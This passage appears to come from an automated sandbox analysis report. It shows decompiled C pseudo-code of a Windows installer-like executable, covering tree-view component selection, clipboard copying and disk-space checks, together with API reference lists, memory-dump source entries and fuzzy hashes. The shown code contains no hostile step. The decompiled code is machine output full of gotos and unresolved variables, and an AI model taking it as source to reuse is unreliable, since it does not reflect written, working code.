                                                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
                                                                  • GlobalLock.KERNEL32 ref: 004051CC
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
                                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
                                                                  • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
                                                                  • SetClipboardData.USER32 ref: 00405209
                                                                  • CloseClipboard.USER32 ref: 0040520F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
                                                                  • String ID: {
                                                                  • API String ID: 1050754034-366298937
                                                                  • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                  • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
                                                                  • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                  • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 93%
                                                                  			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                  				struct HWND__* _v8;
                                                                  				struct HWND__* _v12;
                                                                  				signed int _v16;
                                                                  				intOrPtr _v20;
                                                                  				struct HBITMAP__* _v24;
                                                                  				long _v28;
                                                                  				int _v32;
                                                                  				signed int _v40;
                                                                  				int _v44;
                                                                  				signed int* _v56;
                                                                  				intOrPtr _v60;
                                                                  				signed int _v64;
                                                                  				long _v68;
                                                                  				void* _v72;
                                                                  				intOrPtr _v76;
                                                                  				intOrPtr _v80;
                                                                  				void* _v84;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				struct HWND__* _t182;
                                                                  				int _t196;
                                                                  				long _t202;
                                                                  				signed int _t206;
                                                                  				signed int _t217;
                                                                  				void* _t220;
                                                                  				void* _t221;
                                                                  				int _t227;
                                                                  				signed int _t232;
                                                                  				signed int _t233;
                                                                  				signed int _t240;
                                                                  				void* _t252;
                                                                  				intOrPtr _t258;
                                                                  				char* _t268;
                                                                  				signed char _t269;
                                                                  				long _t274;
                                                                  				int _t280;
                                                                  				signed int* _t281;
                                                                  				int _t282;
                                                                  				long _t283;
                                                                  				int _t285;
                                                                  				long _t286;
                                                                  				signed int _t287;
                                                                  				long _t288;
                                                                  				signed int _t291;
                                                                  				signed int _t298;
                                                                  				signed int _t300;
                                                                  				signed int _t302;
                                                                  				int* _t310;
                                                                  				void* _t311;
                                                                  				int _t315;
                                                                  				int _t316;
                                                                  				int _t317;
                                                                  				signed int _t318;
                                                                  				void* _t320;
                                                                  
                                                                  				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                  				_t182 = GetDlgItem(_a4, 0x408);
                                                                  				_t280 =  *0x7a2fa8;
                                                                  				_t320 = SendMessageA;
                                                                  				_v8 = _t182;
                                                                  				_t315 = 0;
                                                                  				_v32 = _t280;
                                                                  				_v20 =  *0x7a2f88 + 0x94;
                                                                  				if(_a8 != 0x110) {
                                                                  					L23:
                                                                  					if(_a8 != 0x405) {
                                                                  						_t289 = _a16;
                                                                  					} else {
                                                                  						_a12 = _t315;
                                                                  						_t289 = 1;
                                                                  						_a8 = 0x40f;
                                                                  						_a16 = 1;
                                                                  					}
                                                                  					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                  						_v16 = _t289;
                                                                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                                  							if(( *0x7a2f91 & 0x00000002) != 0) {
                                                                  								L41:
                                                                  								if(_v16 != _t315) {
                                                                  									_t232 = _v16;
                                                                  									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                  										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                  									}
                                                                  									_t233 = _v16;
                                                                  									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                  										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                  											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                                  										} else {
                                                                  											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                  										}
                                                                  									}
                                                                  								}
                                                                  								goto L48;
                                                                  							}
                                                                  							if(_a8 == 0x413) {
                                                                  								L33:
                                                                  								_t289 = 0 | _a8 != 0x00000413;
                                                                  								_t240 = E00404627(_v8, _a8 != 0x413);
                                                                  								if(_t240 >= _t315) {
                                                                  									_t93 = _t280 + 8; // 0x8
                                                                  									_t310 = _t240 * 0x418 + _t93;
                                                                  									_t289 =  *_t310;
                                                                  									if((_t289 & 0x00000010) == 0) {
                                                                  										if((_t289 & 0x00000040) == 0) {
                                                                  											_t298 = _t289 ^ 0x00000001;
                                                                  										} else {
                                                                  											_t300 = _t289 ^ 0x00000080;
                                                                  											if(_t300 >= 0) {
                                                                  												_t298 = _t300 & 0xfffffffe;
                                                                  											} else {
                                                                  												_t298 = _t300 | 0x00000001;
                                                                  											}
                                                                  										}
                                                                  										 *_t310 = _t298;
                                                                  										E0040117D(_t240);
                                                                  										_t289 = 1;
                                                                  										_a8 = 0x40f;
                                                                  										_a12 = 1;
                                                                  										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
                                                                  									}
                                                                  								}
                                                                  								goto L41;
                                                                  							}
                                                                  							_t289 = _a16;
                                                                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                  								goto L41;
                                                                  							}
                                                                  							goto L33;
                                                                  						} else {
                                                                  							goto L48;
                                                                  						}
                                                                  					} else {
                                                                  						L48:
                                                                  						if(_a8 != 0x111) {
                                                                  							L56:
                                                                  							if(_a8 == 0x200) {
                                                                  								SendMessageA(_v8, 0x200, _t315, _t315);
                                                                  							}
                                                                  							if(_a8 == 0x40b) {
                                                                  								_t220 =  *0x79f564;
                                                                  								if(_t220 != _t315) {
                                                                  									ImageList_Destroy(_t220);
                                                                  								}
                                                                  								_t221 =  *0x79f578;
                                                                  								if(_t221 != _t315) {
                                                                  									GlobalFree(_t221);
                                                                  								}
                                                                  								 *0x79f564 = _t315;
                                                                  								 *0x79f578 = _t315;
                                                                  								 *0x7a2fe0 = _t315;
                                                                  							}
                                                                  							if(_a8 != 0x40f) {
                                                                  								L86:
                                                                  								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
                                                                  									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                                  									ShowWindow(_v8, _t316);
                                                                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                  								}
                                                                  								goto L89;
                                                                  							} else {
                                                                  								E004011EF(_t289, _t315, _t315);
                                                                  								if(_a12 != _t315) {
                                                                  									E00401410(8);
                                                                  								}
                                                                  								if(_a16 == _t315) {
                                                                  									L73:
                                                                  									E004011EF(_t289, _t315, _t315);
                                                                  									_v32 =  *0x79f578;
                                                                  									_t196 =  *0x7a2fa8;
                                                                  									_v60 = 0xf030;
                                                                  									_v16 = _t315;
                                                                  									if( *0x7a2fac <= _t315) {
                                                                  										L84:
                                                                  										InvalidateRect(_v8, _t315, 1);
                                                                  										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
                                                                  											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
                                                                  										}
                                                                  										goto L86;
                                                                  									}
                                                                  									_t281 = _t196 + 8;
                                                                  									do {
                                                                  										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                  										if(_t202 != _t315) {
                                                                  											_t291 =  *_t281;
                                                                  											_v68 = _t202;
                                                                  											_v72 = 8;
                                                                  											if((_t291 & 0x00000001) != 0) {
                                                                  												_v72 = 9;
                                                                  												_v56 =  &(_t281[4]);
                                                                  												_t281[0] = _t281[0] & 0x000000fe;
                                                                  											}
                                                                  											if((_t291 & 0x00000040) == 0) {
                                                                  												_t206 = (_t291 & 0x00000001) + 1;
                                                                  												if((_t291 & 0x00000010) != 0) {
                                                                  													_t206 = _t206 + 3;
                                                                  												}
                                                                  											} else {
                                                                  												_t206 = 3;
                                                                  											}
                                                                  											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                  											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                  											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                  										}
                                                                  										_v16 = _v16 + 1;
                                                                  										_t281 =  &(_t281[0x106]);
                                                                  									} while (_v16 <  *0x7a2fac);
                                                                  									goto L84;
                                                                  								} else {
                                                                  									_t282 = E004012E2( *0x79f578);
                                                                  									E00401299(_t282);
                                                                  									_t217 = 0;
                                                                  									_t289 = 0;
                                                                  									if(_t282 <= _t315) {
                                                                  										L72:
                                                                  										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                  										_a16 = _t282;
                                                                  										_a8 = 0x420;
                                                                  										goto L73;
                                                                  									} else {
                                                                  										goto L69;
                                                                  									}
                                                                  									do {
                                                                  										L69:
                                                                  										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                                  											_t289 = _t289 + 1;
                                                                  										}
                                                                  										_t217 = _t217 + 1;
                                                                  									} while (_t217 < _t282);
                                                                  									goto L72;
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                  							goto L89;
                                                                  						} else {
                                                                  							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                  							if(_t227 == 0xffffffff) {
                                                                  								goto L89;
                                                                  							}
                                                                  							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                  							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                                  								_t283 = 0x20;
                                                                  							}
                                                                  							E00401299(_t283);
                                                                  							SendMessageA(_a4, 0x420, _t315, _t283);
                                                                  							_a12 = 1;
                                                                  							_a16 = _t315;
                                                                  							_a8 = 0x40f;
                                                                  							goto L56;
                                                                  						}
                                                                  					}
                                                                  				} else {
                                                                  					 *0x7a2fe0 = _a4;
                                                                  					_t285 = 2;
                                                                  					_v28 = 0;
                                                                  					_v16 = _t285;
                                                                  					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
                                                                  					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
                                                                  					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
                                                                  					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                  					 *0x79f564 = _t252;
                                                                  					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                  					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
                                                                  					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                  						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                  					}
                                                                  					DeleteObject(_v24);
                                                                  					_t286 = 0;
                                                                  					do {
                                                                  						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                  						if(_t258 != _t315) {
                                                                  							if(_t286 != 0x20) {
                                                                  								_v16 = _t315;
                                                                  							}
                                                                  							_push(_t258);
                                                                  							_push(_t315);
                                                                  							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
                                                                  						}
                                                                  						_t286 = _t286 + 1;
                                                                  					} while (_t286 < 0x21);
                                                                  					_t317 = _a16;
                                                                  					_t287 = _v16;
                                                                  					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                  					_push(0x15);
                                                                  					E00403DA7(_a4);
                                                                  					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                  					_push(0x16);
                                                                  					E00403DA7(_a4);
                                                                  					_t318 = 0;
                                                                  					_t288 = 0;
                                                                  					if( *0x7a2fac <= 0) {
                                                                  						L19:
                                                                  						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                  						goto L20;
                                                                  					} else {
                                                                  						_t311 = _v32 + 8;
                                                                  						_v24 = _t311;
                                                                  						do {
                                                                  							_t268 = _t311 + 0x10;
                                                                  							if( *_t268 != 0) {
                                                                  								_v60 = _t268;
                                                                  								_t269 =  *_t311;
                                                                  								_t302 = 0x20;
                                                                  								_v84 = _t288;
                                                                  								_v80 = 0xffff0002;
                                                                  								_v76 = 0xd;
                                                                  								_v64 = _t302;
                                                                  								_v40 = _t318;
                                                                  								_v68 = _t269 & _t302;
                                                                  								if((_t269 & 0x00000002) == 0) {
                                                                  									if((_t269 & 0x00000004) == 0) {
                                                                  										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                  									} else {
                                                                  										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                  									}
                                                                  								} else {
                                                                  									_v76 = 0x4d;
                                                                  									_v44 = 1;
                                                                  									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                  									_v28 = 1;
                                                                  									 *( *0x79f578 + _t318 * 4) = _t274;
                                                                  									_t288 =  *( *0x79f578 + _t318 * 4);
                                                                  								}
                                                                  							}
                                                                  							_t318 = _t318 + 1;
                                                                  							_t311 = _v24 + 0x418;
                                                                  							_v24 = _t311;
                                                                  						} while (_t318 <  *0x7a2fac);
                                                                  						if(_v28 != 0) {
                                                                  							L20:
                                                                  							if(_v16 != 0) {
                                                                  								E00403DDC(_v8);
                                                                  								_t280 = _v32;
                                                                  								_t315 = 0;
                                                                  								goto L23;
                                                                  							} else {
                                                                  								ShowWindow(_v12, 5);
                                                                  								E00403DDC(_v12);
                                                                  								L89:
                                                                  								return E00403E0E(_a8, _a12, _a16);
                                                                  							}
                                                                  						}
                                                                  						goto L19;
                                                                  					}
                                                                  				}
                                                                  			}


























































                                                                  0x004046c5
                                                                  0x004046cb
                                                                  0x004046cd
                                                                  0x004046d3
                                                                  0x004046d9
                                                                  0x004046e6
                                                                  0x004046ef
                                                                  0x004046f2
                                                                  0x004046f5
                                                                  0x00404916
                                                                  0x0040491d
                                                                  0x00404931
                                                                  0x0040491f
                                                                  0x00404921
                                                                  0x00404924
                                                                  0x00404925
                                                                  0x0040492c
                                                                  0x0040492c
                                                                  0x0040493d
                                                                  0x0040494b
                                                                  0x0040494e
                                                                  0x00404964
                                                                  0x004049dc
                                                                  0x004049df
                                                                  0x004049e1
                                                                  0x004049eb
                                                                  0x004049f9
                                                                  0x004049f9
                                                                  0x004049fb
                                                                  0x00404a05
                                                                  0x00404a0b
                                                                  0x00404a2c
                                                                  0x00404a0d
                                                                  0x00404a1a
                                                                  0x00404a1a
                                                                  0x00404a0b
                                                                  0x00404a05
                                                                  0x00000000
                                                                  0x004049df
                                                                  0x00404969
                                                                  0x00404974
                                                                  0x00404979
                                                                  0x00404980
                                                                  0x00404987
                                                                  0x00404991
                                                                  0x00404991
                                                                  0x00404995
                                                                  0x0040499a
                                                                  0x0040499f
                                                                  0x004049b5
                                                                  0x004049a1
                                                                  0x004049a1
                                                                  0x004049a9
                                                                  0x004049b0
                                                                  0x004049ab
                                                                  0x004049ab
                                                                  0x004049ab
                                                                  0x004049a9
                                                                  0x004049b9
                                                                  0x004049bb
                                                                  0x004049c9
                                                                  0x004049ca
                                                                  0x004049d6
                                                                  0x004049d9
                                                                  0x004049d9
                                                                  0x0040499a
                                                                  0x00000000
                                                                  0x00404987
                                                                  0x0040496b
                                                                  0x00404972
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404a2f
                                                                  0x00404a2f
                                                                  0x00404a36
                                                                  0x00404aaa
                                                                  0x00404ab1
                                                                  0x00404abd
                                                                  0x00404abd
                                                                  0x00404ac6
                                                                  0x00404ac8
                                                                  0x00404acf
                                                                  0x00404ad2
                                                                  0x00404ad2
                                                                  0x00404ad8
                                                                  0x00404adf
                                                                  0x00404ae2
                                                                  0x00404ae2
                                                                  0x00404ae8
                                                                  0x00404aee
                                                                  0x00404af4
                                                                  0x00404af4
                                                                  0x00404b01
                                                                  0x00404c4e
                                                                  0x00404c55
                                                                  0x00404c72
                                                                  0x00404c78
                                                                  0x00404c8a
                                                                  0x00404c8a
                                                                  0x00000000
                                                                  0x00404b07
                                                                  0x00404b09
                                                                  0x00404b11
                                                                  0x00404b15
                                                                  0x00404b15
                                                                  0x00404b1d
                                                                  0x00404b5e
                                                                  0x00404b60
                                                                  0x00404b70
                                                                  0x00404b73
                                                                  0x00404b78
                                                                  0x00404b7f
                                                                  0x00404b82
                                                                  0x00404c24
                                                                  0x00404c2a
                                                                  0x00404c38
                                                                  0x00404c49
                                                                  0x00404c49
                                                                  0x00000000
                                                                  0x00404c38
                                                                  0x00404b88
                                                                  0x00404b8b
                                                                  0x00404b91
                                                                  0x00404b96
                                                                  0x00404b98
                                                                  0x00404b9a
                                                                  0x00404ba0
                                                                  0x00404ba7
                                                                  0x00404bac
                                                                  0x00404bb3
                                                                  0x00404bb6
                                                                  0x00404bb6
                                                                  0x00404bbd
                                                                  0x00404bc9
                                                                  0x00404bcd
                                                                  0x00404bcf
                                                                  0x00404bcf
                                                                  0x00404bbf
                                                                  0x00404bc1
                                                                  0x00404bc1
                                                                  0x00404bef
                                                                  0x00404bfb
                                                                  0x00404c0a
                                                                  0x00404c0a
                                                                  0x00404c0c
                                                                  0x00404c0f
                                                                  0x00404c18
                                                                  0x00000000
                                                                  0x00404b1f
                                                                  0x00404b2a
                                                                  0x00404b2d
                                                                  0x00404b32
                                                                  0x00404b34
                                                                  0x00404b38
                                                                  0x00404b48
                                                                  0x00404b52
                                                                  0x00404b54
                                                                  0x00404b57
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404b3a
                                                                  0x00404b3a
                                                                  0x00404b40
                                                                  0x00404b42
                                                                  0x00404b42
                                                                  0x00404b43
                                                                  0x00404b44
                                                                  0x00000000
                                                                  0x00404b3a
                                                                  0x00404b1d
                                                                  0x00404b01
                                                                  0x00404a3e
                                                                  0x00000000
                                                                  0x00404a54
                                                                  0x00404a5e
                                                                  0x00404a63
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404a75
                                                                  0x00404a7a
                                                                  0x00404a86
                                                                  0x00404a86
                                                                  0x00404a88
                                                                  0x00404a97
                                                                  0x00404a99
                                                                  0x00404aa0
                                                                  0x00404aa3
                                                                  0x00000000
                                                                  0x00404aa3
                                                                  0x00404a3e
                                                                  0x004046fb
                                                                  0x00404700
                                                                  0x0040470a
                                                                  0x0040470b
                                                                  0x00404714
                                                                  0x0040471f
                                                                  0x0040473a
                                                                  0x0040474c
                                                                  0x00404751
                                                                  0x0040475c
                                                                  0x00404765
                                                                  0x0040477a
                                                                  0x0040478b
                                                                  0x00404798
                                                                  0x00404798
                                                                  0x0040479d
                                                                  0x004047a3
                                                                  0x004047a5
                                                                  0x004047a8
                                                                  0x004047ad
                                                                  0x004047b2
                                                                  0x004047b4
                                                                  0x004047b4
                                                                  0x004047b7
                                                                  0x004047b8
                                                                  0x004047d4
                                                                  0x004047d4
                                                                  0x004047d6
                                                                  0x004047d7
                                                                  0x004047dc
                                                                  0x004047df
                                                                  0x004047e2
                                                                  0x004047e6
                                                                  0x004047eb
                                                                  0x004047f0
                                                                  0x004047f4
                                                                  0x004047f9
                                                                  0x004047fe
                                                                  0x00404800
                                                                  0x00404808
                                                                  0x004048d2
                                                                  0x004048e5
                                                                  0x00000000
                                                                  0x0040480e
                                                                  0x00404811
                                                                  0x00404814
                                                                  0x00404817
                                                                  0x00404817
                                                                  0x0040481d
                                                                  0x00404823
                                                                  0x00404826
                                                                  0x0040482c
                                                                  0x0040482d
                                                                  0x00404832
                                                                  0x0040483b
                                                                  0x00404842
                                                                  0x00404845
                                                                  0x00404848
                                                                  0x0040484b
                                                                  0x00404887
                                                                  0x004048b0
                                                                  0x00404889
                                                                  0x00404896
                                                                  0x00404896
                                                                  0x0040484d
                                                                  0x00404850
                                                                  0x0040485f
                                                                  0x00404869
                                                                  0x00404871
                                                                  0x00404878
                                                                  0x00404880
                                                                  0x00404880
                                                                  0x0040484b
                                                                  0x004048b6
                                                                  0x004048b7
                                                                  0x004048c3
                                                                  0x004048c3
                                                                  0x004048d0
                                                                  0x004048eb
                                                                  0x004048ef
                                                                  0x0040490c
                                                                  0x00404911
                                                                  0x00404914
                                                                  0x00000000
                                                                  0x004048f1
                                                                  0x004048f6
                                                                  0x004048ff
                                                                  0x00404c8c
                                                                  0x00404c9e
                                                                  0x00404c9e
                                                                  0x004048ef
                                                                  0x00000000
                                                                  0x004048d0
                                                                  0x00404808

                                                                  APIs
                                                                  • GetDlgItem.USER32 ref: 004046BE
                                                                  • GetDlgItem.USER32 ref: 004046CB
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
                                                                  • LoadBitmapA.USER32 ref: 0040472A
                                                                  • SetWindowLongA.USER32 ref: 0040473D
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
                                                                  • DeleteObject.GDI32(?), ref: 0040479D
                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
                                                                  • GetWindowLongA.USER32 ref: 004048D7
                                                                  • SetWindowLongA.USER32 ref: 004048E5
                                                                  • ShowWindow.USER32(?,00000005), ref: 004048F6
                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
                                                                  • GlobalFree.KERNEL32 ref: 00404AE2
                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
                                                                  • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
                                                                  • ShowWindow.USER32(?,00000000), ref: 00404C78
                                                                  • GetDlgItem.USER32 ref: 00404C83
                                                                  • ShowWindow.USER32(00000000), ref: 00404C8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 1638840714-813528018
                                                                  • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                  • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
                                                                  • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                  • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 68%
                                                                  			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                  				int _v8;
                                                                  				signed int _v12;
                                                                  				long _v16;
                                                                  				long _v20;
                                                                  				char _v24;
                                                                  				long _v28;
                                                                  				char _v32;
                                                                  				intOrPtr _v36;
                                                                  				long _v40;
                                                                  				signed int _v44;
                                                                  				CHAR* _v52;
                                                                  				intOrPtr _v56;
                                                                  				intOrPtr _v60;
                                                                  				intOrPtr _v64;
                                                                  				CHAR* _v68;
                                                                  				void _v72;
                                                                  				char _v76;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				intOrPtr _t75;
                                                                  				signed char* _t80;
                                                                  				intOrPtr* _t81;
                                                                  				int _t86;
                                                                  				int _t88;
                                                                  				int _t100;
                                                                  				signed int _t105;
                                                                  				char* _t110;
                                                                  				intOrPtr _t114;
                                                                  				intOrPtr* _t128;
                                                                  				signed int _t140;
                                                                  				signed int _t145;
                                                                  				CHAR* _t151;
                                                                  
                                                                  				_t75 =  *0x79ed58;
                                                                  				_v36 = _t75;
                                                                  				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
                                                                  				_v12 =  *((intOrPtr*)(_t75 + 0x38));
                                                                  				if(_a8 == 0x40b) {
                                                                  					E004052A3(0x3fb, _t151);
                                                                  					E00405BFB(_t151);
                                                                  				}
                                                                  				if(_a8 != 0x110) {
                                                                  					L8:
                                                                  					if(_a8 != 0x111) {
                                                                  						L19:
                                                                  						if(_a8 == 0x40f) {
                                                                  							L21:
                                                                  							_v8 = _v8 & 0x00000000;
                                                                  							_v12 = _v12 & 0x00000000;
                                                                  							_t145 = _t144 | 0xffffffff;
                                                                  							E004052A3(0x3fb, _t151);
                                                                  							if(E004055AC(_t169, _t151) == 0) {
                                                                  								_v8 = 1;
                                                                  							}
                                                                  							E004059BF(0x79e550, _t151);
                                                                  							_t80 = E0040555F(0x79e550);
                                                                  							if(_t80 != 0) {
                                                                  								 *_t80 =  *_t80 & 0x00000000;
                                                                  							}
                                                                  							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
                                                                  							if(_t81 == 0) {
                                                                  								L28:
                                                                  								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
                                                                  								__eflags = _t86;
                                                                  								if(_t86 == 0) {
                                                                  									goto L31;
                                                                  								}
                                                                  								_t100 = _v20 * _v28;
                                                                  								__eflags = _t100;
                                                                  								_t145 = MulDiv(_t100, _v16, 0x400);
                                                                  								goto L30;
                                                                  							} else {
                                                                  								_push( &_v32);
                                                                  								_push( &_v24);
                                                                  								_push( &_v44);
                                                                  								_push(0x79e550);
                                                                  								if( *_t81() == 0) {
                                                                  									goto L28;
                                                                  								}
                                                                  								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                                                  								L30:
                                                                  								_v12 = 1;
                                                                  								L31:
                                                                  								if(_t145 < E004045FA(5)) {
                                                                  									_v8 = 2;
                                                                  								}
